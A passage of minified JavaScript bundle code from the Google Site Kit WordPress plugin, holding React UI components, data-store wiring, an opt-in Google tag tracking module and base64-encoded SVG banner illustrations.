NewBadge({tooltipTitle:e,learnMoreLink:t,forceOpen:i,hasLeftSpacing:a,hasNoSpacing:s,onLearnMoreClick:o=()=>{}}){const m=(0,u.jsx)(d.A,{className:n()("googlesitekit-new-badge",{"googlesitekit-new-badge--has-no-spacing":s}),label:(0,l.__)("New","google-site-kit"),hasLeftSpacing:a});return e?(0,u.jsx)(c.Tooltip,{tooltipClassName:"googlesitekit-new-badge__tooltip",title:(0,u.jsxs)(r.Fragment,{children:[e,(0,u.jsx)("br",{}),(0,u.jsx)(g.A,{href:t,onClick:o,external:!0,hideExternalIndicator:!0,children:(0,l.__)("Learn more","google-site-kit")})]}),placement:"top",enterTouchDelay:0,leaveTouchDelay:5e3,open:i,interactive:!0,children:m}):m}NewBadge.propTypes={tooltipTitle:s().string,learnMoreLink:s().string,forceOpen:s().bool,onLearnMoreClick:s().func,hasLeftSpacing:s().bool,hasNoSpacing:s().bool};const m=NewBadge},60947:(e,t,i)=>{"use strict";i.d(t,{A:()=>MetricTileError});var a=i(12317),s=i(82267),o=i(62540);function MetricTileError(e){const{children:t,headerText:i,infoTooltip:n,title:r}=e;return(0,o.jsx)("div",{className:"googlesitekit-km-widget-tile--error",children:(0,o.jsx)(a.A,{title:r,headerText:i,headerContent:n&&(0,o.jsx)(s.A,{title:n}),description:"",error:!0,children:t})})}},61609:(e,t,i)=>{"use strict";i.d(t,{wA:()=>r.A,ws:()=>u.w,WM:()=>n.A});var a=i(29725),s=i(56805),o=i(78913),n=i(35470),r=i(63737),l=i(44319),c=i(31170),d=i(30043),g=i(66293),u=i(52721),m=i(8084),p=i(97241);const I=(0,a.I)({},i.g.wp?.data);I.combineStores=m.o3,I.commonActions=m.jU,I.commonControls=m._5,I.commonStore=m.x0,I.createReducer=function(e){return(0,p.Ay)(e)},I.useInViewSelect=u.w,I.controls=s.n,I.createRegistryControl=o.b,I.createRegistrySelector=o.N,I.useSelect=n.A,I.useDispatch=r.A,I.useRegistry=l.A,I.withSelect=c.A,I.withDispatch=d.A,I.RegistryProvider=g.Ay;const h=I;void 0===i.g.googlesitekit&&(i.g.googlesitekit={}),i.g.googlesitekit.data=h},61983:(e,t,i)=>{"use strict";i.d(t,{A:()=>DismissButton});var a=i(62688),s=i.n(a),o=i(82871),n=i(49383),r=i(62540);function DismissButton({className:e,label:t=(0,o.__)("Maybe later","google-site-kit"),onClick:i,disabled:a,tertiary:s=!0}){return i?(0,r.jsx)(n.Button,{className:e,onClick:i,disabled:a,tertiary:s,children:t}):null}DismissButton.propTypes={className:s().string,label:s().string,onClick:s().func,disabled:s().bool,tertiary:s().bool,dismissOptions:s().shape({expiresInSeconds:s().number,skipHidingFromQueue:s().bool})}},62659:(e,t,i)=>{"use strict";i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var a=i(63696),s=i(19826);const __WEBPACK_DEFAULT_EXPORT__=function(){return(0,a.useContext)(s.Ay)}},63505:(e,t,i)=>{"use strict";i.d(t,{A:()=>A});var a=i(62688),s=i.n(a),o=i(4452),n=i.n(o),r=i(63696),l=i(13113),c=i(6109),d=i(62540);function Sparkline({sparkline:e,invertChangeColor:t}){let i=e;return i&&t&&(i=(0,r.cloneElement)(e,{invertChangeColor:t})),(0,d.jsx)("div",{className:"googlesitekit-data-block__sparkline",children:i})}Sparkline.propTypes={sparkline:s().element,invertChangeColor:s().bool};const g=Sparkline;var u=i(5855),m=i(82871),p=i(38017);function Change({change:e,changeDataUnit:t,period:i,invertChangeColor:a}){let s=e;return t&&(s="%"===t?(0,c.Eo)(e,{style:"percent",signDisplay:"never",maximumFractionDigits:1}):(0,c.Eo)(e,t)),i&&(s=(0,m.sprintf)(i,s)),(0,d.jsxs)("div",{className:n()("googlesitekit-data-block__change",{"googlesitekit-data-block__change--no-change":!e}),children:[!!e&&(0,d.jsx)("span",{className:"googlesitekit-data-block__arrow",children:(0,d.jsx)(p.A,{direction:0<parseFloat(e)?"up":"down",invertColor:a})}),(0,d.jsx)("span",{className:"googlesitekit-data-block__value",children:s})]})}Change.propTypes={change:s().oneOfType([s().string,s().number]),changeDataUnit:s().oneOfType([s().string,s().bool]),period:s().string,invertChangeColor:s().bool};const I=Change;var h=i(44148),y=i(33052);function Content({title:e="",datapoint:t=null,datapointUnit:i="",change:a=null,changeDataUnit:s="",period:o="",source:n,sparkline:l,invertChangeColor:m=!1,gatheringData:p=!1,badge:A}){const M=void 0===t?t:(0,c.Eo)(t,i);return(0,d.jsxs)(r.Fragment,{children:[(0,d.jsxs)("div",{className:"googlesitekit-data-block__title-datapoint-wrapper",children:[(0,d.jsxs)(y.A,{as:"h3",size:"small",type:"title",className:" googlesitekit-subheading-1 googlesitekit-data-block__title ",children:[!0===A?(0,d.jsx)(u.A,{"aria-hidden":"true",className:"googlesitekit-badge--hidden",label:"X"}):A,(0,d.jsx)("span",{className:"googlesitekit-data-block__title-inner",children:e})]}),!p&&(0,d.jsx)("div",{className:"googlesitekit-data-block__datapoint",children:(0,d.jsx)("span",{className:"googlesitekit-data-block__datapoint--resize",children:M})})]}),!p&&l&&(0,d.jsx)(g,{sparkline:l,invertChangeColor:m}),!p&&(0,d.jsxs)("div",{className:"googlesitekit-data-block__change-source-wrapper",children:[(0,d.jsx)(I,{change:a,changeDataUnit:s,period:o,invertChangeColor:m}),n&&(0,d.jsx)(h.A,{className:"googlesitekit-data-block__source",name:n.name,href:n.link,external:n?.external})]})]})}function DataBlock({stat:e=null,className:t="",title:i="",datapoint:a=null,datapointUnit:s="",change:o=null,changeDataUnit:c="",context:g="default",period:u="",selected:m=!1,source:p,sparkline:I,handleStatSelection:h=null,invertChangeColor:y=!1,gatheringData:A=!1,gatheringDataNoticeStyle:M=l.v.DEFAULT,badge:N}){const f=(0,r.useCallback)(()=>{!A&&h&&h(e)},[A,h,e]),T=(0,r.useCallback)(e=>{"Enter"!==e.key&&" "!==e.key||(e.preventDefault(),f())},[f]),S="button"===g,k=S?"button":"";return(0,d.jsxs)("div",{className:n()("googlesitekit-data-block",t,`googlesitekit-data-block--${g}`,{"googlesitekit-data-block--selected":m,"googlesitekit-data-block--is-gathering-data":A}),tabIndex:S&&!A?"0":"-1",role:h&&k,onClick:f,onKeyDown:T,"aria-disabled":A||void 0,"aria-label":h&&i,"aria-pressed":h&&m,children:[(0,d.jsx)(Content,{title:i,datapoint:a,datapointUnit:s,change:o,changeDataUnit:c,period:u,source:p,sparkline:I,invertChangeColor:y,gatheringData:A,badge:N}),A&&(0,d.jsx)(l.A,{style:M})]})}Content.propTypes={title:s().string,datapoint:s().oneOfType([s().string,s().number]),datapointUnit:s().string,change:s().oneOfType([s().string,s().number]),changeDataUnit:s().oneOfType([s().string,s().bool]),period:s().string,source:s().object,sparkline:s().element,invertChangeColor:s().bool,gatheringData:s().bool,badge:s().oneOfType([s().bool,s().node])},DataBlock.propTypes={stat:s().number,className:s().string,title:s().string,datapoint:s().oneOfType([s().string,s().number]),datapointUnit:s().string,change:s().oneOfType([s().string,s().number]),changeDataUnit:s().oneOfType([s().string,s().bool]),context:s().string,period:s().string,selected:s().bool,source:s().object,sparkline:s().element,handleStatSelection:s().func,invertChangeColor:s().bool,gatheringData:s().bool,gatheringDataNoticeStyle:s().oneOf(Object.values(l.v)),badge:s().oneOfType([s().bool,s().node])};const A=DataBlock},63972:(e,t,i)=>{"use strict";i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var a,s=i(63696);function o(){return o=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},o.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>s.createElement("svg",o({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 11 9"},e),a||(a=s.createElement("path",{stroke:"currentColor",strokeWidth:1.5,d:"M1 3.838 4.106 7 10 1"})))},64515:(e,t,i)=>{"use strict";function Null(){return null}i.d(t,{A:()=>Null})},65054:(e,t,i)=>{"use strict";i.d(t,{M9:()=>k,sx:()=>T,BI:()=>S});var a=i(17243);const s="_googlesitekitDataLayer",o="data-googlesitekit-gtag";function n(e){return function(){e[s]=e[s]||[],e[s].push(arguments)}}var r=i(84895);const l={activeModules:[],isAuthenticated:!1,referenceSiteURL:"",trackingEnabled:!1,trackingID:"",userIDHash:"",userRoles:[]};const{activeModules:c=[],isSiteKitScreen:d,trackingEnabled:g,trackingID:u,referenceSiteURL:m,userIDHash:p,isAuthenticated:I,userRoles:h}=i.g._googlesitekitTrackingData||{},y={activeModules:c,trackingEnabled:g,trackingID:u,referenceSiteURL:m,userIDHash:p,isSiteKitScreen:d,userRoles:h,isAuthenticated:I,pluginVersion:"1.170.0"},{enableTracking:A,disableTracking:M,isTrackingEnabled:N,initializeSnippet:f,trackEvent:T,trackEventOnce:S}=function(e,t=i.g,c=i.g){const d={...l,...e};d.referenceSiteURL&&(d.referenceSiteURL=d.referenceSiteURL.toString().replace(/\/+$/,""));const g=function(e,t){const a=n(t);let l;const{activeModules:c,referenceSiteURL:d,userIDHash:g,userRoles:u=[],isAuthenticated:m,pluginVersion:p}=e;return function(){const{document:t}=i.g;if(void 0===l&&(l=!!t.querySelector(`script[${o}]`)),l)return!1;l=!0;const n=u?.length?u.join(","):"";a("js",new Date),a("config",e.trackingID,{groups:"site_kit",send_page_view:e.isSiteKitScreen,domain:d,plugin_version:p||"",enabled_features:Array.from(r.t).join(","),active_modules:c.join(","),authenticated:m?"1":"0",user_properties:{user_roles:n,user_identifier:g}});const I=t.createElement("script");return I.setAttribute(o,""),I.async=!0,I.src=`https://www.googletagmanager.com/gtag/js?id=${e.trackingID}&l=${s}`,t.head.appendChild(I),{scriptTagSrc:`https://www.googletagmanager.com/gtag/js?id=${e.trackingID}&l=${s}`}}}(d,t),u=function(e,t,i,a){const s=n(t);return async function(t,o,n,r){const{trackingEnabled:l}=e;if(!l)return null;i();const c={send_to:"site_kit",event_category:t,event_label:n,value:r};return new Promise(e=>{const i=setTimeout(function(){a.console.warn(`Tracking event "${o}" (category "${t}") took too long to fire.`),e()},1e3);function n(){clearTimeout(i),e()}s("event",o,{...c,event_callback:n}),a._gaUserPrefs?.ioo?.()&&n()})}}(d,t,g,c),m={};return{enableTracking:function(){d.trackingEnabled=!0},disableTracking:function(){d.trackingEnabled=!1},initializeSnippet:g,isTrackingEnabled:function(){return!!d.trackingEnabled},trackEvent:u,trackEventOnce:function(...e){const t=JSON.stringify(e);m[t]||(m[t]=(0,a.once)(u)),m[t](...e)}}}(y);function k(e){e?A():M()}d&&g&&f()},65379:(e,t,i)=>{"use strict";i.d(t,{A:()=>n});var a=i(50532),s=i.n(a),o=i(17243);const n=s()(({metrics:e,dimensions:t,...i}={})=>({metrics:r(e),dimensions:l(t),...i}));function r(e){return(0,o.castArray)(e).map(e=>"string"==typeof e?{name:e}:e).filter(e=>(0,o.isPlainObject)(e))}function l(e){return(0,o.castArray)(e).map(e=>"string"==typeof e?{name:e}:e).filter(e=>(0,o.isPlainObject)(e))}},65385:(e,t,i)=>{"use strict";i.d(t,{A:()=>r});var a=i(50539),s=i(88273),o=i(74426),n=i(62540);function r({moduleName:e,FallbackComponent:t,IncompleteComponent:i}){return r=>{function WhenActiveComponent(o){const l=(0,a.useSelect)(t=>t(s.i).getModule(e),[e]);if(!l)return null;const c=t||o.WidgetNull||null;if(!1===l.active)return c&&(0,n.jsx)(c,{...o});if(!1===l.connected){const e=i||c;return e&&(0,n.jsx)(e,{...o})}return(0,n.jsx)(r,{...o})}return WhenActiveComponent.displayName=`When${(0,o.Uf)(e)}Active`,(r.displayName||r.name)&&(WhenActiveComponent.displayName+=`(${r.displayName||r.name})`),WhenActiveComponent}}},65929:(e,t,i)=>{"use strict";i.d(t,{A:()=>u});var a=i(63696),s=i(50539),o=i(29785),n=i(97345),r=i(88273),l=i(70301),c=i(49993),d=i(65054),g=i(62659);function u(e){const t=(0,g.A)(),i=(0,s.useSelect)(t=>t(r.i).getModule(e)),u=(0,s.useSelect)(e=>e(n.oR).hasCapability(n.HD)),{activateModule:m}=(0,s.useDispatch)(r.i),{navigateTo:p}=(0,s.useDispatch)(l.M),{setInternalServerError:I}=(0,s.useDispatch)(o.O4),h=(0,a.useCallback)(async()=>{const{error:i,response:a}=await m(e);i?I({id:`${e}-setup-error`,description:i.message}):(await(0,d.sx)(`${t}_widget-activation-cta`,"activate_module",e),await(0,c.SO)("module_setup",e,{ttl:300}),p(a.moduleReauthURL))},[m,e,p,I,t]);return i?.name&&u?h:null}},67438:(e,t,i)=>{"use strict";i.d(t,{A:()=>Notification});var a=i(62688),s=i.n(a),o=i(63696),n=i(50539),r=i(7972),l=i(8732),c=i(37133);function d(e){return`notification/${e}/viewed`}function g(e){return(0,n.useSelect)(t=>!!t(r.n).getValue(d(e)),[e])}function ViewedStateObserver({id:e,observeRef:t,threshold:i}){const a=(0,c.A)(t,{threshold:i}),{setValue:s}=(0,n.useDispatch)(r.n),{markNotificationSeen:d}=(0,n.useDispatch)(l.D),u=!!a?.isIntersecting,m=g(e),p=(0,o.useRef)();function I(){p.current&&clearTimeout(p.current)}return(0,o.useEffect)(()=>(!m&&u?(I(),p.current=setTimeout(()=>{a?.isIntersecting&&(s(g.getKey(e),!0),d(e))},3e3)):!u&&p.current&&I(),()=>{I()}),[m,u,s,d,e,a]),null}g.getKey=d,ViewedStateObserver.propTypes={id:s().string,observeRef:s().object,threshold:s().number};var u=i(68761),m=i(62540);function Notification({id:e,className:t,gaTrackingEventArgs:i,children:a,onView:s}){const r=(0,o.useRef)(),c=g(e),d=(0,u.A)(e,i?.category,{viewAction:i?.viewAction}),[p,I]=(0,o.useState)(!1),h=(0,n.useSelect)(t=>t(l.D).getNotificationSeenDates(e)),{dismissNotification:y}=(0,n.useDispatch)(l.D);return(0,o.useEffect)(()=>{!p&&c&&(d.view(i?.label,i?.value),s?.(),I(!0)),h?.length>=3&&y(e,{skipHidingFromQueue:!0})},[c,d,p,i,s,h,y,e]),(0,m.jsxs)("section",{id:e,ref:r,className:t,children:[a,!c&&(0,m.jsx)(ViewedStateObserver,{id:e,observeRef:r,threshold:.5})]})}Notification.propTypes={id:s().string,className:s().string,gaTrackingEventArgs:s().shape({category:s().string,viewAction:s().string,label:s().string,value:s().string}),children:s().node,onView:s().func}},67510:(e,t,i)=>{"use strict";i.d(t,{Q:()=>A,A:()=>BannerNotification});var a=i(4452),s=i.n(a),o=i(62688),n=i.n(o),r=i(50539),l=i(8732),c=i(68761),d=i(83891),g=i(41671),u=i(71189),m=i(61983),p=i(10740);const I="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMzYwIiBoZWlnaHQ9IjIzNCIgdmlld0JveD0iMCAwIDM2MCAyMzQiIGZpbGw9Im5vbmUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+CjxwYXRoIGQ9Ik03My4xMzAyIDE3MC42NjhDODkuMzcxOSAxODkuOTkgMTE1LjQ3NiAxOTUuMTEgMTMxLjg2NSAxODkuOTkxQzE1My4yNDYgMTgzLjMxMiAxNjYuNjcyIDE2Mi45NjcgMTg1LjUwMiAxNjAuNTQ0QzIwNC4zMzMgMTU4LjEyMSAyMTUuNDA2IDE2OC43MDYgMjM1Ljg5NyAxNzAuMjMzQzI1Ni4zODkgMTcxLjc2IDI4MS4yMzIgMTY3LjYzIDI5Mi43OTEgMTM3LjkzNUMzMDQuMzQ5IDEwOC4yMzkgMjkzLjk0OCA3OC4yMzIxIDI3MC4yMTQgNjQuMzYxNUMyNDYuNDgxIDUwLjQ5MDggMjMzLjI3MSA2Ni43Njk0IDIxMC41NjQgNjguMTIzN0MxODcuODU4IDY5LjQ3NzkgMTc4LjAyMyA0NS44NTI4IDE2MS4wMjMgNDQuMzUyOEMxNDQuMDIzIDQyLjg1MjggMTM0LjUyMyA0NS44NTMgMTI0LjUyMyA1OC44NTI5QzExNC41MjMgNzEuODUyOCAxMjAuMzcxIDg1Ljc2NDEgODkuNTIzNSA5OS44NTNDNTguNjc1OCAxMTMuOTQyIDU2Ljg4ODUgMTUxLjM0NSA3My4xMzAyIDE3MC42NjhaIiBmaWxsPSIjRkZFNEIxIi8+CjxnIGZpbHRlcj0idXJsKCNmaWx0ZXIwX2RfMjcwNV8xNzY4NikiPgo8cmVjdCB4PSIxMTYuNTIzIiB5PSI1Ny45MTk5IiB3aWR0aD0iMTI4IiBoZWlnaHQ9IjEyOC41MzMiIHJ4PSI2Ljk4MjUyIiBmaWxsPSIjRUJFRUYwIi8+CjxtYXNrIGlkPSJtYXNrMF8yNzA1XzE3Njg2IiBzdHlsZT0ibWFzay10eXBlOmFscGhhIiBtYXNrVW5pdHM9InVzZXJTcGFjZU9uVXNlIiB4PSIxMTYiIHk9IjU3IiB3aWR0aD0iMTI5IiBoZWlnaHQ9IjEzMiI+CjxyZWN0IHg9IjExNi41MjMiIHk9IjU3LjkxOTkiIHdpZHRoPSIxMjgiIGhlaWdodD0iMTMwLjEzMyIgcng9IjYuOTgyNTIiIGZpbGw9IiNERUUzRTYiLz4KPC9tYXNrPgo8ZyBtYXNrPSJ1cmwoI21hc2swXzI3MDVfMTc2ODYpIj4KPHJlY3QgeD0iMTI1LjA1NyIgeT0iMTE3LjY1MyIgd2lkdGg9IjExMC40IiBoZWlnaHQ9IjMwLjkzMzMiIHJ4PSIzLjc1MTI4IiBmaWxsPSIjRjNGNUY3Ii8+CjxyZWN0IHg9IjEyNS4wNTciIHk9IjEwMy4yNTMiIHdpZHRoPSIxMTAuNCIgaGVpZ2h0PSIzMC45MzMzIiByeD0iMy43NTEyOCIgZmlsbD0iI0YzRjVGNyIvPgo8cmVjdCB4PSIxMjUuMDU3IiB5PSIxNTYuMDUzIiB3aWR0aD0iMTEwLjQiIGhlaWdodD0iMzAuOTMzMyIgcng9IjMuNzUxMjgiIGZpbGw9IiNGM0Y1RjciLz4KPHJlY3Qgd2lkdGg9IjMyIiBoZWlnaHQ9IjE4Ljk0NjUiIHJ4PSIyLjMxNTY5IiB0cmFuc2Zvcm09Im1hdHJpeCgxIDAgMCAtMSAyMDMuNDU3IDk1LjYyNDkpIiBmaWxsPSIjRjNGNUY3Ii8+CjxyZWN0IHdpZHRoPSIzMiIgaGVpZ2h0PSIxOC45NDY1IiByeD0iMi4zMTU2OSIgdHJhbnNmb3JtPSJtYXRyaXgoMSAwIDAgLTEgMTYzLjk5IDk1LjYyNTcpIiBmaWxsPSIjRjNGNUY3Ii8+CjxyZWN0IHdpZHRoPSIzMiIgaGVpZ2h0PSIxOC45NDY1IiByeD0iMi4zMTU2OSIgdHJhbnNmb3JtPSJtYXRyaXgoMSAwIDAgLTEgMTI0LjUyMyA5NS42MjU3KSIgZmlsbD0iI0YzRjVGNyIvPgo8L2c+CjxwYXRoIGQ9Ik0xMTYuNTIzIDY0LjkzNTVDMTE2LjUyMyA2MS4wNzkyIDExOS42NSA1Ny45NTMgMTIzLjUwNiA1Ny45NTNIMjM3LjM4M0MyNDEuMjM5IDU3Ljk1MyAyNDQuMzY1IDYxLjA3OTIgMjQ0LjM2NSA2NC45MzU1VjY4LjUzM0gxMTYuNTIzVjY0LjkzNTVaIiBmaWxsPSJ3aGl0ZSIvPgo8cmVjdCB4PSIxMjEuODEzIiB5PSI2MS40Nzk2IiB3aWR0aD0iMy41MjY2NyIgaGVpZ2h0PSIzLjUyNjY3IiByeD0iMS43NjMzMyIgZmlsbD0iI0YzRjVGNyIvPgo8cmVjdCB4PSIxMjcuMTA0IiB5PSI2MS40Nzk2IiB3aWR0aD0iMy41MjY2NyIgaGVpZ2h0PSIzLjUyNjY3IiByeD0iMS43NjMzMyIgZmlsbD0iI0YzRjVGNyIvPgo8cmVjdCB4PSIxMzIuNDM3IiB5PSI2MS40Nzk2IiB3aWR0aD0iMy41MjY2NyIgaGVpZ2h0PSIzLjUyNjY3IiByeD0iMS43NjMzMyIgZmlsbD0iI0YzRjVGNyIvPgo8L2c+CjxjaXJjbGUgY3g9IjE4MC41MjMiIGN5PSIxMjAuODUzIiByPSIxNy4zNzkzIiBmaWxsPSIjNEUzMzAwIiBzdHJva2U9IndoaXRlIiBzdHJva2Utd2lkdGg9IjIuNzU4NjIiLz4KPGNpcmNsZSBjeD0iMS42NTUxNyIgY3k9IjEuNjU1MTciIHI9IjEuNjU1MTciIHRyYW5zZm9ybT0ibWF0cml4KDEgMCAwIC0xIDE3OC44NjggMTE2Ljk5MSkiIGZpbGw9IiNGRkU0QjEiLz4KPHJlY3Qgd2lkdGg9IjMuMzEwMzQiIGhlaWdodD0iOS4zNzkzMSIgcng9IjEuNjU1MTciIHRyYW5zZm9ybT0ibWF0cml4KDEgMCAwIC0xIDE3OC44NjggMTI4LjU3NykiIGZpbGw9IiNGRkU0QjEiLz4KPGRlZnM+CjxmaWx0ZXIgaWQ9ImZpbHRlcjBfZF8yNzA1XzE3Njg2IiB4PSIxMDcuOTkiIHk9IjUxLjUxOTkiIHdpZHRoPSIxNDUuMDY3IiBoZWlnaHQ9IjE0Ni4xMzMiIGZpbHRlclVuaXRzPSJ1c2VyU3BhY2VPblVzZSIgY29sb3ItaW50ZXJwb2xhdGlvbi1maWx0ZXJzPSJzUkdCIj4KPGZlRmxvb2QgZmxvb2Qtb3BhY2l0eT0iMCIgcmVzdWx0PSJCYWNrZ3JvdW5kSW1hZ2VGaXgiLz4KPGZlQ29sb3JNYXRyaXggaW49IlNvdXJjZUFscGhhIiB0eXBlPSJtYXRyaXgiIHZhbHVlcz0iMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMTI3IDAiIHJlc3VsdD0iaGFyZEFscGhhIi8+CjxmZU9mZnNldCBkeT0iMi4xMzMzMyIvPgo8ZmVHYXVzc2lhbkJsdXIgc3RkRGV2aWF0aW9uPSI0LjI2NjY3Ii8+CjxmZUNvbXBvc2l0ZSBpbjI9ImhhcmRBbHBoYSIgb3BlcmF0b3I9Im91dCIvPgo8ZmVDb2xvck1hdHJpeCB0eXBlPSJtYXRyaXgiIHZhbHVlcz0iMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDAgMC4xNSAwIi8+CjxmZUJsZW5kIG1vZGU9Im5vcm1hbCIgaW4yPSJCYWNrZ3JvdW5kSW1hZ2VGaXgiIHJlc3VsdD0iZWZmZWN0MV9kcm9wU2hhZG93XzI3MDVfMTc2ODYiLz4KPGZlQmxlbmQgbW9kZT0ibm9ybWFsIiBpbj0iU291cmNlR3JhcGhpYyIgaW4yPSJlZmZlY3QxX2Ryb3BTaGFkb3dfMjcwNV8xNzY4NiIgcmVzdWx0PSJzaGFwZSIvPgo8L2ZpbHRlcj4KPC9kZWZzPgo8L3N2Zz4K",h="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNDAwIiBoZWlnaHQ9IjIwMiIgdmlld0JveD0iMCAwIDQwMCAyMDIiIGZpbGw9Im5vbmUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+CjxwYXRoIGQ9Ik04NC44NTc1IDk3LjYxNjZDMTA1Ljg1NyAxMzQuMDIgMTUzLjIwMSAxMDYuMTIzIDE4MS4zNTcgMTE0LjU3MkMyMDkuNTEzIDEyMy4wMiAyMTMuNDY4IDE2MS41NDUgMjM1Ljg1NyAxNjkuOTI1QzI1OC4yNDUgMTc4LjMwNiAzMDMuMDY4IDE3MS41MTUgMzE2LjAwMiAxMzguMTM1QzMyOC45MzYgMTA0Ljc1NCAzMTIuMTY3IDgzLjY1MjkgMjg3LjY1MiA3Mi4xNjk0QzI2My4xMzYgNjAuNjg1OSAyNjguOTc2IDM2Ljc4MzYgMjM0LjE2NiAyNy44MDA5QzE5OS4zNTcgMTguODE4MiAxNzguNjY1IDQxLjI2NTEgMTQwLjE2NSAzMC43OTI3QzEwMS42NjUgMjAuMzIwNCA2My44NTc4IDYxLjIxMzEgODQuODU3NSA5Ny42MTY2WiIgZmlsbD0iI0ZGREVEMyIvPgo8ZyBmaWx0ZXI9InVybCgjZmlsdGVyMF9kXzI3MDVfMTc2MzMpIj4KPHJlY3QgeD0iMTI3LjY2NiIgeT0iMzcuODQxMSIgd2lkdGg9IjEyOCIgaGVpZ2h0PSIxMjguMTk0IiByeD0iNi45ODI1MiIgZmlsbD0iI0VCRUVGMCIvPgo8bWFzayBpZD0ibWFzazBfMjcwNV8xNzYzMyIgc3R5bGU9Im1hc2stdHlwZTphbHBoYSIgbWFza1VuaXRzPSJ1c2VyU3BhY2VPblVzZSIgeD0iMTI3IiB5PSIzNyIgd2lkdGg9IjEyOSIgaGVpZ2h0PSIxMzEiPgo8cmVjdCB4PSIxMjcuNjY2IiB5PSIzNy44NDExIiB3aWR0aD0iMTI4IiBoZWlnaHQ9IjEyOS43OSIgcng9IjYuOTgyNTIiIGZpbGw9IiNERUUzRTYiLz4KPC9tYXNrPgo8ZyBtYXNrPSJ1cmwoI21hc2swXzI3MDVfMTc2MzMpIj4KPHJlY3QgeD0iMTM2LjIiIHk9Ijk3LjQxNjkiIHdpZHRoPSIxMTAuNCIgaGVpZ2h0PSIzMC44NTE4IiByeD0iMy43NTEyOCIgZmlsbD0iI0YzRjVGNyIvPgo8cmVjdCB4PSIxMzYuMiIgeT0iODMuMDU0NiIgd2lkdGg9IjExMC40IiBoZWlnaHQ9IjMwLjg1MTgiIHJ4PSIzLjc1MTI4IiBmaWxsPSIjRjNGNUY3Ii8+CjxwYXRoIGQ9Ik0xMzYuMiAxMzkuNDY3QzEzNi4yIDEzNy4zOTUgMTM3Ljg3OSAxMzUuNzE2IDEzOS45NTEgMTM1LjcxNkgyNDIuODQ5QzI0NC45MiAxMzUuNzE2IDI0Ni42IDEzNy4zOTUgMjQ2LjYgMTM5LjQ2N1YxNjUuOTM1SDEzNi4yVjEzOS40NjdaIiBmaWxsPSIjRjNGNUY3Ii8+CjxyZWN0IHdpZHRoPSIzMiIgaGVpZ2h0PSIxOC44OTY2IiByeD0iMi4zMTU2OSIgdHJhbnNmb3JtPSJtYXRyaXgoMSAwIDAgLTEgMjE0LjU5OSA3NS40NDY3KSIgZmlsbD0iI0YzRjVGNyIvPgo8cmVjdCB3aWR0aD0iMzIiIGhlaWdodD0iMTguODk2NiIgcng9IjIuMzE1NjkiIHRyYW5zZm9ybT0ibWF0cml4KDEgMCAwIC0xIDE3NS4xMzMgNzUuNDQ3NikiIGZpbGw9IiNGM0Y1RjciLz4KPHJlY3Qgd2lkdGg9IjMyIiBoZWlnaHQ9IjE4Ljg5NjYiIHJ4PSIyLjMxNTY5IiB0cmFuc2Zvcm09Im1hdHJpeCgxIDAgMCAtMSAxMzUuNjY2IDc1LjQ0NzYpIiBmaWxsPSIjRjNGNUY3Ii8+CjwvZz4KPHBhdGggZD0iTTEyNy42NjYgNDQuODU2N0MxMjcuNjY2IDQxLjAwMDQgMTMwLjc5MyAzNy44NzQyIDEzNC42NDkgMzcuODc0MkgyNDguNTI2QzI1Mi4zODIgMzcuODc0MiAyNTUuNTA4IDQxLjAwMDQgMjU1LjUwOCA0NC44NTY3VjQ4LjQyNjNIMTI3LjY2NlY0NC44NTY3WiIgZmlsbD0id2hpdGUiLz4KPHJlY3QgeD0iMTMyLjk1NiIgeT0iNDEuMzkxNSIgd2lkdGg9IjMuNTI2NjciIGhlaWdodD0iMy41MTczNyIgcng9IjEuNzU4NjgiIGZpbGw9IiNGM0Y1RjciLz4KPHJlY3QgeD0iMTM4LjI0NyIgeT0iNDEuMzkxNSIgd2lkdGg9IjMuNTI2NjciIGhlaWdodD0iMy41MTczNyIgcng9IjEuNzU4NjgiIGZpbGw9IiNGM0Y1RjciLz4KPHJlY3QgeD0iMTQzLjU4IiB5PSI0MS4zOTE1IiB3aWR0aD0iMy41MjY2NyIgaGVpZ2h0PSIzLjUxNzM3IiByeD0iMS43NTg2OCIgZmlsbD0iI0YzRjVGNyIvPgo8L2c+CjxjaXJjbGUgY3g9IjE5MS42NjYiIGN5PSIxMDAuOTE1IiByPSIxNi44IiBmaWxsPSIjQUM0MjIwIiBzdHJva2U9IndoaXRlIiBzdHJva2Utd2lkdGg9IjIuNjY2NjciLz4KPHBhdGggZD0iTTE5Mi45MTQgOTMuOTgxOEgxOTAuNDE4QzE5MC4wOTIgOTMuOTgxOCAxODkuODQzIDk0LjI3MTQgMTg5Ljg5MSA5NC41OTM2TDE5MS4xMzkgMTAyLjk3M0MxOTEuMjI5IDEwMy41OCAxOTIuMTA0IDEwMy41OCAxOTIuMTk0IDEwMi45NzNMMTkzLjQ0MiA5NC41OTM2QzE5My40OSA5NC4yNzE0IDE5My4yNCA5My45ODE4IDE5Mi45MTQgOTMuOTgxOFoiIGZpbGw9IiNGRkRFRDMiLz4KPGNpcmNsZSBjeD0iMTkxLjY2NiIgY3k9IjEwNi43ODIiIHI9IjEuNiIgZmlsbD0iI0ZGREVEMyIvPgo8ZGVmcz4KPGZpbHRlciBpZD0iZmlsdGVyMF9kXzI3MDVfMTc2MzMiIHg9IjExOS4xMzMiIHk9IjMxLjQ0MTEiIHdpZHRoPSIxNDUuMDY3IiBoZWlnaHQ9IjE0NS4yNjEiIGZpbHRlclVuaXRzPSJ1c2VyU3BhY2VPblVzZSIgY29sb3ItaW50ZXJwb2xhdGlvbi1maWx0ZXJzPSJzUkdCIj4KPGZlRmxvb2QgZmxvb2Qtb3BhY2l0eT0iMCIgcmVzdWx0PSJCYWNrZ3JvdW5kSW1hZ2VGaXgiLz4KPGZlQ29sb3JNYXRyaXggaW49IlNvdXJjZUFscGhhIiB0eXBlPSJtYXRyaXgiIHZhbHVlcz0iMCAwIDAgMCAwIDAgMCAwIDAgMCAwI